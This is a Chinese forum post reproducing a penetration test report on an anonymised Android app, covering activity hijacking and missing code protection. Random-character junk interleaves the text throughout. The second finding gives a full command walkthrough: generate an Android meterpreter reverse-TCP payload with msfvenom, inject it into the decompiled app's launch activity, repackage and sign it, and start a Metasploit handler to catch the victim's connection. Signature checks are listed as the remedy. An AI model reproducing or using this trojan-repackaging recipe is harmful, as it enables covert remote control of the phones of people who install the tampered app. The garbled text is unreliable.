. K; s; B8 s) n( _* V: c3 H& f3 {$ L, M1 c7 ], Q- _   5 \8 ^. G# a5 Q1 B5 k 2 h7 I( \8 @& [. B: i' v

4 t# l m5 |) S/ m- M/ K' S& O1 b4 O" n8 f: S

) P' u, b3 {7 Q) [; D/ {4 ? % w9 O5 i- e( U' B: y' D 1-2 测试结果 2 a4 z% T" S3 b, x8 b : z) K: m x/ M$ R4 T% p2 q

# h) t9 L1 C( ?# T 3 ~2 c" d n3 Z9 O. e

, a% X4 a& O. z& { $ i A+ g$ w- @ m4 H. n. c   4 Q( B4 B/ N' \% e & I+ q1 }$ S2 a& ? V4 \

7 O0 K( W+ b8 _, R: \ ( d6 J( h4 [! Q

7 O: H9 }1 y _ @) J, ]) F/ g: B* b* b8 ^' w3 [ 2 检测结果                    - O7 N; l( x1 c6 e& x ) E* h% N! P; M `+ U1 g

9 |5 N( i# h, k& A) l" R- T* o4 P+ S" }8 s# d

/ s# ^ p4 T1 u4 k7 I( a5 J+ _ 1 |4 E4 c3 \& w4 P1 c6 F 2.1 某某某 - z4 G% Z z9 Q0 b: p 5 e1 z6 _8 i q, n5 ^

$ d9 [2 U0 B- f# X 7 a/ ~" _% {0 T3 D$ o2 m

; X5 K& _2 R0 U9 Q% y- @9 S' E , f5 h: S0 C, L# U+ `2 p; k: @ 2.1.1检测目标 ' {1 w l1 T; J+ f' B# I7 p. |7 i 4 J5 O7 Y& g, w1 U

& z/ T6 M; o$ N* L. | " u( F' a0 _% E1 V8 o2 W

$ z" I* a7 k, i1 |* u. s. ~5 s % S+ F. L$ @0 d4 m4 q, X; ?% I: b; } 目标地址: 某某某某某某APP - M. h! c% Q% L7 s0 o1 { 7 j* `+ f6 z- W: q( A. p Z

* T0 Q* @% s, D2 b / _8 {9 O+ H; s( U M

0 b8 Y( }5 Q- n( J9 U" @, D7 ~ 4 U& c( K" t/ M7 R- A3 p7 i 2.1.2检测结果 9 i! N4 x/ l# A 8 V$ K \5 v% u8 _3 W

+ p" J2 K* p) B+ w 7 d7 B8 F6 X- B& l" {0 g; a

2 @' i+ N. U" ?: o$ X' Q( G h+ q4 L 2.1.2.1 " D0 \2 f0 Y; K8 s3 U6 l; B 9 F9 [+ i g9 A0 g

! N* g5 u. e5 |/ h! d$ O& n1 T3 d! U! e1 \1 |7 K

# A' B% t$ Z# F) Z8 b# ? 5 @$ P" ^5 ]% T5 x1 `1 S 漏洞链接地址:某某某某某某APP 3 j9 k# e/ ^5 _! Q4 Y( z6 r1 W6 D , `- V3 G0 t- l) Q9 i

L3 G% v8 x: e5 E+ t( F. l `6 v9 ^4 |3 o

. n; _( s3 @7 G2 C / I/ ~! {' B( G% D# ?% m5 N   / E# a5 r" Q, V f! e - s9 S q! z9 A- e/ U# ?

' }8 _9 L) A- c, K5 ~6 }! O % p9 N! a2 {% W7 Z9 M" l: y, p

* t: w3 l1 v2 b& _" ?* ~- j 0 e7 y: h7 V1 k/ _ 漏洞分析及取证: 7 g1 O5 q1 y2 B9 g9 G- N/ x! d% @. B Y* ~; h7 I

# D2 g+ ?" T: d5 R% D ) ]$ K- |: a' {9 V5 t* Z& |9 g/ k

! d1 E2 `& {; d- K+ M c/ z5 m) n / I( H K5 ^( T7 s3 n) H! ^ L; _, D                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 8 I2 X9 J1 i `8 ^$ @ 7 _$ P. N. q) @! [: m/ I& [' }

! Z+ w; q3 Q- H; o) \0 M 9 ]1 u2 j1 t2 v8 d

. X2 |2 _8 `: b! [+ f' a 3 B ]3 L/ l( C: h+ Y      - R, w: Y7 ^( Z) Z- g : [# k1 k7 W' T4 f

6 n( v; J, b( o0 T; Q8 | v " W f+ ], H" U& t

; s/ T6 ^9 u8 g) D" p' S; ` H- o& R/ b% b, f                       5 P; Y9 x- M3 F) u* [ $ e! k$ {- W! q" i+ D

0 P$ v4 z9 h. {. c9 g' n+ ` ) x% `$ A: x5 q% P

5 N. @* M8 g0 W+ h& i& d/ F2 R) O # H% G* d+ _* K* i* Z3 D" F) w - \, x* j7 }5 L" X& ~6 i4 R + L4 J* t* ~, N

1 o8 o, Y5 N, B, A" Y # f9 q5 s- j' f; ]3 c/ Q! s8 t

$ Y9 A4 X" W5 Q& z3 y, T9 p7 V5 I2 l 6 G9 J# R/ U2 R$ J. R / ?+ m( S8 ` G* F- s& e, s; R, M7 k c' ]7 J3 ]' @7 P" M

/ _; v$ d0 d: W, O- y# m " [7 x0 r- `! ]7 O. T) q

1 V2 I6 ]" n# c9 s$ G+ V+ | . X% q( D* J( L7 Z: z 7 ?) y$ c' ^* Q7 P. i 4 s: s- p& e+ i! ?! }. S5 u5 W

! @$ p0 Z4 q3 @0 [/ F% ~4 S" T . R' X- i" X$ c

; @6 g, `/ w6 B9 f G e 1 w, j1 x* S5 I/ y# @ 漏洞危害:高 * S7 a+ a- D1 ?7 Y5 X/ i! X4 B- E8 A, A7 `. H0 E6 J/ ~

' K. e1 T- v, \8 ]/ E9 ]5 a5 H/ ^! U: ?7 x
" u4 Z0 K* s. g+ ~: m( \; U& }. \. \+ N * B% V$ L2 t: J/ k: V0 b, I$ R7 I4 D: B' g" ?, b+ X+ G& o" ]5 o( C U: k K2 {* Z i ^1 x4 d* m& d8 X3 U7 {1 u; [3 ~; A F3 U: w+ q) ^. _" A# ]8 x+ e: b* t$ W) b% W$ q X5 t& T8 o' M& M6 l$ p) B* S+ z6 {* {! ]: i; ^2 Q- \5 c. r) i0 i& c" q! `+ f- N1 a4 V: S* z6 i( I7 C8 ]" r& {- i, T- ^2 x: \! @2 P9 W' f9 K: L4 N# S4 o+ G m/ V. M( u) C+ k/ }! h8 ?2 B2 ~* x; F( l& e; Y& h" ?# Z0 f( E$ y6 H1 \! i A" K" q5 u/ _# w( g) z' H+ M: y; F' I8 z" B0 i8 m* |2 ~. B- c3 S+ [5 _1 {6 H0 \7 K: T% I6 }% Q4 t, c& O0 J! Y8 I0 H0 b6 Y& e& X! m$ P! E" }( O5 V. l0 q: H q
# T2 |' w4 o. |" t 4 M. S8 R7 _, l) @& r

/ @/ Q5 N& m6 s5 F S3 P- B0 d * c; j' n2 O5 I7 e1 B9 r& l 严重程度 . ~8 Y7 N7 P/ W, T/ U3 |0 Z3 n Z) N9 y $ p+ h+ q% i' z7 e& p e

1 J- P0 j& W% `+ @ z! m 5 \0 K- h* P/ C 		2 A0 V. t6 k8 A0 [3 |# l* `% K/ b 2 P5 y& e( b, n, d( D$ n

4 {' b5 Q& l4 Q4 E4 v& V: e, ~0 [% G9 f+ n( T1 H , L2 W8 K3 Z6 V # s4 P+ o% Q+ Q% V. r

. F8 Y. L2 r3 C& g. Z& c; y ; F X# @ Q9 y% t1 ]% k 		( A2 C- s( ` l. L. d0 ? + P5 I' c( j v8 j# r' S6 m

- { U! {% m5 q8 K , m; v6 U+ ^+ ^+ X+ y 3 Y i0 W0 t: V, n' E) J3 H# v 5 l1 G) S+ `/ ? ]. `

( ?- u% J9 R4 p- n; i/ ? 9 Q: _8 I7 a3 ]+ h j3 J 		" l; l6 J$ q' ?8 `/ X % I) Q' ?3 `2 i$ Y' o' G

# K/ c7 K* F5 t$ i, b , N& c- Y/ L4 ]% M7 P a4 V 8 v s* l& s+ c/ b ' j+ z" x8 ^( I$ i; h. R3 Z

" e& T$ @6 w. X& Q& u " W. R( L* r/ y3 r# j 		# c7 ~. p2 @ v( e6 B 1 z9 Y% U3 m4 c5 a

2 f3 Y3 B% W+ W! S ! p0 r; @, M& K   $ _4 y6 s1 K! q+ G/ R* e/ W8 g6 E. ^& P% B; G8 G: N

; ~* j7 P$ L; W! T 3 F- e0 B# ]; }; {( F 		" L) R3 k8 {, M2 ?' }8 T I. o2 h+ L& S- k

; g" o3 }' [1 ?* Z 2 j6 R7 }$ o2 C- E d% C/ [* n " j6 {7 g! ]9 J! m. E5 N; ] & v# a/ |0 B, T8 a0 J# u

) l7 {8 G }7 H; h2 k & Q( Z9 O9 p( e9 b, V8 v 		$ X# m, W( H6 W R! i" \, a: e& v; D

& w/ `; H6 z6 X; ~3 G- G7 P& d: }3 v$ P: k 2 r5 f+ j* U: `' _, o4 U0 u   ! R- y8 g3 b+ r) N 0 L( C: i" }$ y7 q {

3 U; ~6 L: z9 W9 d: [) K9 ?. A. I" p" z7 t7 P
( }2 n# x; D$ ^- b- T/ C8 L 9 `4 q( ~+ I9 q
6 w" }+ a9 I, l' B* }- b% \ D$ Z: }! \ U

8 s b' i- y6 P% ~6 N6 ~ , F4 V" A: b; B- ?- o1 P5 v3 W# B   ! O) ?" O( j; b Z% E' T 3 W3 [% @0 @( w7 f

) S- M5 z7 Z# N3 I) B3 w5 ` & X2 K/ j: ^/ @# k# a

7 K+ ?! Y* T$ o+ r 6 z3 X1 Y+ i' l& |+ P: ~/ O& Z# [ 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ) D5 S3 o2 Y0 \* b' j 9 e7 i$ q2 l: O0 t" t4 f0 o

! Y- G, z" L" t' E4 m1 v' r2 q6 w- c( |' h

" f- H/ [) ^' ]: o9 p$ t4 b d8 |( |: N$ j5 f, R- r g0 a9 Y           ( _% R1 J2 D) C 6 e" p" G! A+ ?) y' B) g

& B/ r2 [9 L- K/ `6 } / {& F7 R5 \; a

5 \4 h7 t" P( x0 |. @+ p+ a4 v8 h: {5 ?3 m   " b5 P# l2 [5 a 9 C; D- F. p- X

* C( n4 V }, P7 ]" B) F0 M5 a z$ _8 k; J) x+ P2 [$ l7 _

! K. P$ I8 @2 D, f+ u 7 f; [7 l7 X1 ?: l0 z 2.1.2.2 ( s! ^6 o# _7 s ) z* M6 C9 |% x6 R5 W5 r

( J1 s9 i0 K+ t) I# t {" j+ z# k1 S0 L

( G. j( g; P3 |" W/ z * I# H* @+ C8 D; m1 X E8 n1 L 漏洞链接地址:某某某某某某APP . G a; d: Z' I d# T5 I / O9 m& \5 _1 B. k

: \8 e3 Z, q- ]8 Q8 S. @, k( \) s' `' Z8 Y9 J2 F

3 u" l5 b- j5 Z$ y6 s 2 d* L1 i7 M) F/ s4 ~ 漏洞分析及取证: , B3 a" d ^ R8 \ } ) G/ n1 ^# X( ~' I# ~0 M5 d$ z* L

5 U+ l7 [3 l7 D! Q 3 F, s3 ^" _; d9 d+ Q" F

$ H0 W* g0 L! g 3 g! R) m/ ~9 I8 ^                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 4 \( J) J- }- T3 A& s" F6 i* N1 ]! X! u% T" n* n, m1 h

, }: d) v. X. C) J+ m% m ~- s * ^6 m. g/ m; g; O' S( C

" V1 F( O+ h2 g$ d; R / d4 D0 Q/ x' I5 n) @, l Metasploit 生成木马 apk $ ~, o& a) O% N# }; I* @ - t; R0 z3 E" J

0 O$ x3 _. O3 V3 I1 I0 \8 K 4 v$ H9 {9 z4 A9 e5 Y; I! {* j

8 y0 x6 V1 x3 f k8 b % l: W( ?! C+ k# q/ Z msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk . z, |& R, x: X: H1 s% \ 9 W$ @- P. G0 ]

8 s/ _0 k; t! I ( L9 w$ G$ I7 A! J3 |

S; r$ `. Z) s7 V/ A, O, y. v- ^ & |* a" U& w3 C& A6 B7 O2 c! u 反编译目标apk和木马apk 5 G) E: K. _1 ?) w* y 7 \7 @& C2 V O

1 b% Z2 i9 \# y- n3 {. Y : O6 }$ [* m7 q- h& [: e; S

# y [. E: A# k 9 C. m7 B0 p+ x4 |, {. X apktool d target.apk
4 t; @* P; h+ d/ m9 T1 N1 `+ h 6 K1 w V1 k1 H1 c( l$ `2 t apktool d cockhorse.apk - ?1 K0 S: L# d3 u3 Q( N9 `) z* Z2 B* I$ B& ?+ l" ?

5 _9 E, r; H& f8 g; Z 2 N6 B6 t: H3 n* t' y1 B# p

\/ b& H* {6 W1 Y' C7 V* S, n n0 s) b( P. y P: Y 木马 apk 注入目标 apk 2 {4 {. G% |! N3 j% h) z( q# U 3 }9 T! t6 e S# }( _

0 T' O8 Z& z) o5 b3 W0 n6 [2 K5 R1 D" F( s

0 ^. e+ A0 X, p$ T9 m8 \2 x$ m9 x b1 ]7 ^7 g: i! O/ y 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
+ R* [) C8 l+ P, n S4 G# k# H# V3 F% Y5 e invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V $ X7 ` [: c; \, q: H2 T% k7 V$ q0 k: a. X1 o6 A% S

1 B% u* b' }, r" M8 c . l: ?6 ^7 H, d; }0 K

' W2 G0 G5 n6 u 8 z6 Q8 ]# A2 b+ D$ k' a6 ] 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 2 L& o7 d/ p+ ?. c7 `& m' ~% L ( r7 J0 K: }( }2 M

/ N! y$ \; W% I* C2 D: n 7 Z9 ]- X6 P+ x3 _! z& {, H

) {( @# q/ G% V! f) p) ?7 j+ D% ^ ( J- o% ~9 o, |9 H 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 9 o4 @+ Z7 A# P6 g# Y; e 8 y6 V0 b- D# T$ j) O

* i# f2 F s5 T& F 8 }# j; E: E3 |

4 d* C! A( z1 y8 y2 k- T! q 8 y( K! Z) E8 l1 R, A2 r8 d9 `1 R 回编译生成最终 apk ' E- J/ I8 _( ]8 A( w+ r2 L! e 7 Z! b" U) u! |) `$ L- s

8 [& T# V" `( J1 F " d+ a" Q$ s* q, m @ B$ S

2 ?" m w/ N+ U7 r3 p ( ~$ S9 z4 h1 h: |4 `6 I 重新打包 $ m4 d" m. E, u * Y- G) z; F5 @1 y e

8 S0 x7 @* e, }, D/ C6 \ : t! j4 p1 o# y. v/ S9 b8 L' Q. R( K

Y1 X- L8 w/ d9 b / j2 D3 o0 c# j2 ] apktool b -o repackage.apk target_app_floder o( R* n0 B7 I . C8 {( X- o$ v# Q

4 t% Y0 @( Q7 _ 5 S. A" t5 k, [, L

1 c \% n* o; ?0 g9 b1 _6 D" G1 A' s 创建签名文件,有的话可忽略此步骤 1 e' ^, }0 V) M- _# \ 8 M- n% e0 Z7 s

- i1 k' `: E. A 9 G! \9 \, \- P3 L

' U- I' t; A9 S" x/ _% ~* d/ T% F5 k+ @$ `- m$ z5 Z$ f' B& e keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                * V2 U- M8 d3 i; L2 j' N- B) X- c: b, Y: c/ {% J" b; _

' d* |" B$ m, K; z5 _" o K6 F$ K! h

( d- J( N* }; P o ( u/ _4 N2 W% G6 U+ F 签名,以下任选其一 ; O4 v* \: U+ F0 L1 N , C* n7 E- B8 }. L* H$ J

5 T( @4 z7 E" g$ T2 W ( s9 Z W# z& [8 x- b7 G- i7 K

6 h: c2 j3 e9 E0 p/ K7 ?$ I& G! R0 e' [, t% h, I1 A/ b jarsigner 方式 ; y& D& D1 x, x% x6 I! D " H, R& ?) d+ ^) Y7 }* m

' ?5 g9 Q4 P( T! [- v' E & N" S. Y, P. M6 ]5 z3 }

) U9 ?" g$ {% l8 z/ [* u/ p3 t. e; y7 Q7 b+ O jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ) _7 w* _+ m) N& Y5 [* I 0 q& s [; e( [7 ~

: E( n* @5 F! N$ k0 C $ Y0 q1 r3 T) [: q/ c

, m: J9 c$ g$ \* h; j4 F6 E# L$ \6 A. K# n' r0 O apksigner 方式 - |# Y# M/ L' p' |4 X . P7 g, f3 F/ S1 Y) n. J j

% I$ ~) h) u: T/ |3 F5 b 4 Z; Q e. U/ R0 t, R

* e6 y! v+ f6 b- l ]: z 0 U! ?% Z- |4 O) {1 x apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 9 v! [, q3 K# w8 E , N+ `8 r& ]! d" h/ o H- [. @

8 V0 p# c7 ]5 v X3 i+ r0 x9 e9 b; `* D$ Z/ K+ y( [; E

: l3 H9 [7 w- n% o7 a ! r8 D* |! W: X+ y3 y7 g$ ` O 如需要禁用 v2签名 添加选项--v2-signing-enabled false ! Z* r* D0 a+ {: w$ z1 d* G+ S . f( m- x. M7 s3 `

( c; h- E" c: ?. P5 e2 I1 R6 K7 P6 Q: c

2 u: q- U5 K5 |! C9 [: o i V I0 D: Z' i+ C 验证,以下任选其一 . W' z: e" C* l, o0 D" M, W 6 A+ Y8 h" ]; w( P

- p. a: [" K8 ^5 _ 7 _" {7 l( N) m$ `' q% Q

! t6 O- T$ E# f1 j1 R8 `3 b: f1 e# U& }" K7 R7 V0 d. Q jarsigner方式 1 b* B& x5 z. W9 |% T* u , s/ x. i( p3 F8 O

O3 c: f0 B7 m1 |: G8 d. Q " p% x: h' e, e3 H

7 g5 Z8 S; a3 | _ 9 f- L5 J5 I4 k; b5 e. ` jarsigner -verify repackaged.apk - y' u4 R6 c/ j, n# d1 r9 p+ L) U, \- P6 }4 Q# O

0 e, J* D% u& p. j- @, N {0 v. n4 b+ X& g2 f

& Z$ ]) l* u& R$ ], R * j: T; t/ v: z7 S+ ^ apksigner 方式 2 |# H; o g; ~8 O 8 D& i L) j( Z" f& Z

; h- I0 E1 K, j0 w ' j# ^# n+ s1 Z8 R! P

+ C) Z9 i! N0 `5 ?& W% l1 M ! l, W1 F# h% R2 d Q5 F apksigner verify -v --print-certs repackaged.apk $ c; i+ M8 v9 d" L) m " D' m* F3 U/ b7 e% N1 |! {

Y0 b( u( |& a( S. E: J. S5 _8 Q2 i3 y# V& m D$ h

1 y+ X+ V- I! ]. x5 r9 `$ G 2 C* f- C' m$ J keytool方式 ( o% a: O; i+ b; u 8 s! b6 I1 E4 ?' w

1 J Z, ]: I$ l( S! r : \3 K# ~: v2 D1 h. t. ^; g6 u

7 i5 R8 T; b7 J: T$ p0 t% x / m- X! @ M, h0 ?5 Y6 _( _ keytool -printcert -jarfile repackaged.apk & V) [* _5 [. u& C7 c( o, I / x t6 v9 E2 f O' d0 D

: \, c5 d3 d+ v! G ; Z0 ?+ ?% X- j9 |, }0 C/ H! ?

) |' U/ n. V" M5 S% f2 O6 d; H 3 W7 G! x2 E6 Z& }" f& f3 i4 w 对齐 2 |$ e+ @! R7 H7 [* ?+ h) ?, }! ?4 l' {. W' g# x' ?9 F

5 E ~' c8 }3 x! S$ R6 E3 R& G, z ( R1 i$ T- s, V. A

2 C4 W3 l/ u3 f) c( w0 a 4 d2 K% ]; ^/ {& k& g% T" P 字节对齐优化 " z4 j$ |% p" ?4 N6 y9 x! [; ?! i 5 [1 C# q# q& m \* f0 K* b% q$ V

/ l% I; U f% T2 q. H" Z 6 K o& I- u+ Q7 E+ d

: _* O& C) a) q# W# z) o/ B * s: d) J; {3 ~2 r. F zipalign -v 4 repackaged.apk final.apk 0 d R* ^' I- ?3 {9 v - J0 j; x! h! ?) U

" _! F, k5 h2 Q0 p- d6 E4 D * g# S" s% @: w

1 q- Q1 {, W i, q# U P. ^$ [* E: B+ L" u 检查是否对齐 # i) r& x& X) N Q+ D; Z* H% E8 f# i' O3 W7 I

3 x0 v$ x. q1 f6 F [% m/ _ / [5 {8 B3 r' H$ f

9 _( a7 R O* d/ u2 J1 D1 c * w( ~2 y) L- s4 w8 J9 A8 o zipalign -c -v 4 final.apk 8 i& Q1 C& s! O! A) W + G t- G) t- M, U3 D

. B$ L! q! t! Z( k2 P, L& y6 { 6 y% _0 Y9 g1 m: `: Y. O( t

# l' T9 {7 S* O* X 3 U0 [5 M ~2 P r7 g 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 ( M* ?1 u9 l2 S% u; o# q ' g8 Z, u7 d8 a3 ^1 t/ g9 F# V

( r" E( I2 r+ J7 E3 | ; _) i, c7 N8 q' ~+ @

3 x/ a5 [: @- b( C/ }2 g - h) o. K- w3 L5 `2 [0 i 启动Metasploit控制台,配置参数等待上线 ' P, g& `, D( n1 b" _" U# C0 a! N/ C& \% @0 f3 D& O+ H

$ k+ ^* h8 K& \+ ~( `5 ^& x 9 M# t- G: J. q9 X( c

4 e6 o' y: n9 B6 j* l6 N }! b W1 F+ @* v2 s 在终端依次输入如下命令 ' U) B p2 P1 `) k2 n: a, q! ?0 K- ]9 ?

& [/ G. M# n# f$ M( h/ G8 K5 g 1 y) m; }7 T- z& Z

+ b- W* j7 A3 E2 }# e/ [6 k7 ]) I ) `: ?' f3 B6 D' ?) J9 P4 \ msfconsole & f( S/ m* A$ v4 O3 [# \ / H: z1 R8 [* O) {; m

# X# h& S5 h) f$ j8 u " c# t& M; Q! n

& M1 I( \* }4 ^7 D 0 N! G6 Q4 P2 @- O4 B use exploit/multi/handler 5 X- C8 S, s8 F* k) ]3 s/ F; O# |* l$ z# i( [5 m# S" R9 E3 v

1 Q5 I6 ?0 @$ S9 Y# o+ c4 j % a1 \) E0 D2 O& l! o0 k

. ]" U( E6 r& J1 a, n7 n 9 |4 S! s1 U. Y D8 Y set PAYLOAD android/meterpreter/reverse_tcp 4 q6 L8 e R( x8 p$ o+ C 2 Q3 f* O& f) h7 N# {# T1 P( |

- s% c$ E9 E% \' B: M 9 j5 q9 o1 T2 \) q. I: u0 ?

4 h* S# _1 Y/ z1 P 3 h. m4 Q- W0 U3 P set LHOST 192.xxx.xx.xx ! Z7 y, w2 E$ H# `+ F/ @ / J" T6 L F+ y1 d% p* U* z( a

/ {6 a+ p8 \4 A" q5 t. }1 W% }/ U& _1 |+ H+ p: m$ v

. J* e4 X) W H: q ' s0 ]; ~+ q; h3 K6 T- ~& l set LPORT 4444 3 F7 }( y @1 h$ i; @ * t9 a/ b5 D5 B3 B x

. x8 O( H* {) i 6 A2 M8 x) O) ^4 z

7 ^7 P) M" l: t5 s+ N1 ^7 Y' D 7 P$ M4 t! v! o exploit ! M- F* B) _9 X* O3 G! v, ] ~1 T( f% e F, E6 a

$ G: ]9 X$ i) I; R2 o 0 K& o7 t# K7 D+ A

) H& N/ C0 s# K9 Q9 L % v9 Y' y: \* h* x& C8 z8 z! Y 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               7 y; l# A. |4 v" p* z/ O& u) j5 e- U2 K5 z }2 e

4 S) A! ], L% l: [ W- z 9 R' j* W- v! _8 h+ A

, t* l" E, ^/ Y3 a. X7 L1 j 9 `) F" k6 @6 r4 U' {, |5 m 漏洞危害:中 9 ]6 N$ U' H3 ?- j( s/ A1 a 3 \. H) _- }5 s9 P

: v6 b8 B- H) ~8 c% K$ W; B & ~7 o, _! f4 K3 ?) A
5 X: O' c3 ~3 I+ _+ @ * V4 G* i9 z6 N, H . [# c# B! \1 p/ m6 _2 i* [; h& ?. Z, W L / E3 T! a V. [9 v: T" l) ]8 X" ]* x s6 l' q* Y+ i a; Y, m, s* r( V7 S. N+ f8 R7 T3 }- z( Y4 R: a& ]/ {* ]+ I U, d! |% T- [+ K8 y% B5 T* s! C6 q, M7 K: n' w1 ]9 o* L8 c8 H, r/ l% }* e+ X# ` L, @" z0 k* V0 D6 h' ~0 g2 `! q9 G& s$ t) F' @/ C9 x" B( Q U* F) Y) Y' D5 X& k1 \! }, a3 @& e" J/ u# w4 A1 O; D! [8 V% Z7 N6 @) |+ ^) t ^) n8 [7 T) V3 u; U1 W" N2 S" ~9 V Y$ L1 S8 T7 i+ X. x/ X a) v1 l* B" z5 B! ]0 M$ j- s! @0 k% z0 D; y6 C& J5 h4 f4 o4 H6 W, U: W' m0 V0 F3 P/ @; x+ B. f3 z0 n5 V" O/ X7 u& _3 q( i3 v0 S: @5 [3 W5 L+ m: S m- S8 g0 {6 d3 }
& s, \/ S: f' I1 b9 ^ 2 z' J. F' k! x6 @

2 z& `9 @2 X) r# q# C$ h3 ] ( `, t9 |9 ?- S9 p" p( _ 严重程度 * W/ ~ i% }* m& v ! F2 B9 \ f, H6 t+ J& t

3 Y) K: V% q/ i9 ~$ l& K! S/ ]# k 9 u6 M; D7 ^: S 		, r/ |# S0 M u8 ~" V: F # e% g0 u! N6 L$ B$ ^

( T6 S- J) t4 B' B + \8 U8 s1 n. y! [4 R5 y1 w ) @, T; R) J8 A9 Q% E1 A0 }1 n 2 O$ A! P! _/ E4 I7 [

' Q4 A; {) |+ W7 o+ t: R1 n- [% y4 r2 s' `( j/ X5 i! E 		; ~9 `! W* M0 U, r- ~ % Z6 U' [* F2 n6 c( ^6 m4 W9 f$ D

* ~$ @9 O) a8 B3 \% J8 f & b) ^% G0 y3 g $ ~' R- Q$ I/ r) U- I) r7 I ) b4 |8 f; q2 S$ M% {3 D j/ B

# z6 }- T. H8 B9 N/ w+ v# t7 k$ l7 V: `! I/ a 		, w' L" ]0 B- W: Q 3 x- W, k* C$ C0 R3 M& ~

: U* m7 @0 N3 C4 [ 2 s/ j2 Q4 q) t & ?, H' N- i% f$ \ ! w! A% S9 l9 Y$ k; P

$ J+ e; ?; I# c+ I1 i: s/ T : G' _! V" L& D4 M4 H 		$ g; @% u+ d9 D$ e& w6 F 0 P- f1 g& | ~ H: i 0 b! S( F. _' _8 t) N1 ]0 J . ^* a1 b8 q- u0 @

8 T, ?4 [' M3 C! H- `) f) b . p! L$ u0 l6 A) n% [   8 d" @- f4 o3 q4 H c& C: ^' W. [+ P& L/ F

0 k6 E5 @( A1 O3 H* n $ `0 n8 ^* F8 l; \$ U 		: B% G, t3 K, ?0 N ! j" f9 @4 a* G/ E. q o& _; V

6 s% K. r7 f8 K$ ]% j/ D" { J 9 h. k6 ]$ v/ x, H6 ? ; {( P; @$ @/ S" f% C2 L . q; n' A: G$ J1 u0 u* l

' e& f4 `' @( Z' Z2 H, M* m% l * h. Y/ B! Y9 n8 O 		4 ]8 T: {9 v/ ^6 e - M1 }1 ~: P0 {! O( W+ J( m . U- S. X- K# m! [2 Q! h, r4 x 1 A, m6 H9 W0 ~: u/ h' M& z

7 R0 J% t5 M, W( Z6 ?1 @ " X/ [& A( Q7 W) i, N4 W   . r$ J( j2 ^/ u3 S7 o) [. E ( J( ]! @5 y( K6 H% X

1 h2 b5 D% G% u / @9 _6 }. M: X: M$ _9 `: E1 X
# y) D+ V1 ~- {0 h& a - {- C; l% r5 }! ^& E6 {# o
) O9 L" ~) P! L; M* R % d$ s8 r4 m% v% ?. F

( I9 a4 V* e) H! c e% J, l0 r# G 8 Y" Q' ^ L, L* ^$ t' h. E   8 Z# f/ y$ Q4 {4 { . @' f+ ^2 Q, n. B# S! n" u; K

# E. z) Q: r$ w! n3 K h) [5 X( x/ k! R# K ~, I

, s0 p& D8 |, W' D6 p. j& }2 z8 Z1 s j) `% _% e E: f+ O' T o 修复方法: 4 }# H/ b4 W: P; W1 b 5 R9 s# _& P4 r

% v3 u% v& B, J1 @( H4 q8 q6 P }) a ! m: u/ d, r( F0 E

. P5 G m4 s r/ Z* v1 v3 m7 p & C! h$ D h' s3 l1 E               1. APP 启动时应做签名校验防止二次打包。
Q* F! ]9 Q0 E! L 5 x6 g3 F w- F7 w7 \ 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 3 T$ ~' e" P8 d( g . m% ?2 X) ?- e, I9 K J

8 W/ O+ [9 e5 r) T- x8 P 5 k/ o& y, h5 A8 c - ?2 Q) Z t& z 2 t" ^- s, b2 o5 f# ?

. p: z! x# U) G' w* S ( j& z. c: F! Q: S( K* v   ! ?6 W- b4 F0 Q q& ^) F ; b$ c; B3 z0 H& l8 i/ `

) y% q; T* T" f, U) @8 y7 s' j6 D , @' ]4 O& _4 {1 G # w* \8 @3 o7 ~. r6 f/ ?8 u 0 }) p8 g+ k$ ~- d# y+ r" X% _

1 M6 ]- K3 f; S2 Y4 | 5 O( g2 a& }' I; a @$ s- W9 ~
3 b* g- h/ r0 x$ y1 T $ ]' y4 k. D2 c! m

; ^# Q6 |( U+ }. E. I# j ) A4 D+ S% b4 O4 J9 ?
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表